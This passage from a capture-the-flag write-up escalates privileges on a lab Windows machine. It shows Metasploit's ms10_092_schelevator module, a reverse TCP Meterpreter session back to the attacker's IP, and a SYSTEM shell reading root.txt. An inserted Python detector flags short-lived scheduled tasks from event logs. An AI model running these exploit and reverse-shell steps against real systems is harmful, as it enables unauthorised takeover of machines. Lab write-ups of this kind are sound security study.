Running one of the suggester's recommendations

This time I use exploit/windows/local/ms10_092_schelevator (because it was used in many writeups, and it is apparently "a fairly common and reliable one").

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.13
msf5 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\saaKbk.exe
[*] Creating task: 1uBDeH8S
[*] SUCCESS: The scheduled task "1uBDeH8S" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\1uBDeH8S...
[*] Original CRC32: 0xffb3d93d
[*] Final CRC32: 0xffb3d93d
[*] Writing our modified content back...
[*] Validating task: 1uBDeH8S
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] 1uBDeH8S                                 1/3/2020 3:56:00 ��    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "1uBDeH8S".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.11:50110) at 2020-02-19 12:58:37 -0500
[*] SUCCESS: The scheduled task "1uBDeH8S" was successfully deleted.
[*] SCHELEVATOR

meterpreter >
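The module output above shows a scheduled task being created, changed, run and deleted again within a single short run, a lifecycle that stands out in task audit logs. As an added example (not from the original write-up), this Python correlates Windows Security scheduled-task events 4698 to 4702 to report such short-lived tasks. The sample events, their timestamps and the five-minute threshold are constructed assumptions, and task auditing is assumed to be enabled.

```python
from datetime import datetime, timedelta

# Windows Security event IDs for scheduled-task changes.
CREATED, DELETED, ENABLED, DISABLED, UPDATED = 4698, 4699, 4700, 4701, 4702

# Constructed sample events: (timestamp, event id, task name, account). Not real logs.
SAMPLE_TASK_EVENTS = [
    ("2020-02-19T12:58:20", CREATED, r"\1uBDeH8S", r"ARCTIC\tolis"),
    ("2020-02-19T12:58:24", DISABLED, r"\1uBDeH8S", r"ARCTIC\tolis"),
    ("2020-02-19T12:58:27", ENABLED, r"\1uBDeH8S", r"ARCTIC\tolis"),
    ("2020-02-19T12:58:40", DELETED, r"\1uBDeH8S", r"ARCTIC\tolis"),
    ("2020-02-19T09:00:00", CREATED, r"\NightlyBackup", r"ARCTIC\Administrator"),
    ("2020-02-19T09:00:05", UPDATED, r"\NightlyBackup", r"ARCTIC\Administrator"),
    ("2020-02-19T13:30:00", DELETED, r"\OrphanTask", r"ARCTIC\Administrator"),
]


def short_lived_tasks(events, max_lifetime=timedelta(minutes=5)):
    """Return tasks that were created and deleted again within max_lifetime.

    Events are sorted by time first, so out-of-order log delivery is tolerated.
    A delete with no observed create is skipped, and a task that is never
    deleted is not reported.
    """
    open_tasks = {}  # task name -> [creation time, creator, change count]
    findings = []
    for ts, event_id, task, account in sorted(events):
        when = datetime.fromisoformat(ts)
        if event_id == CREATED:
            open_tasks[task] = [when, account, 0]
        elif task in open_tasks and event_id in (ENABLED, DISABLED, UPDATED):
            open_tasks[task][2] += 1
        elif task in open_tasks and event_id == DELETED:
            created, creator, changes = open_tasks.pop(task)
            if when - created <= max_lifetime:
                findings.append({"task": task, "created_by": creator,
                                 "lifetime_s": int((when - created).total_seconds()),
                                 "changes": changes})
    return findings
```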

Getting root.txt

meterpreter > pwd
C:\Windows\system32
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>more c:\\users\\administrator\\desktop\\root.txt

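This retrieves the contents of root.txt!

Closing thoughts

By the way, I forgot to grab user.txt, but it can be obtained in a similar way, so I will skip it.

I did not expect to learn this much from working through a single machine. I will keep working at it.

Please send any corrections or advice in the comments or on Twitter! さんぽし(@sanpo_shiho) | Twitter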
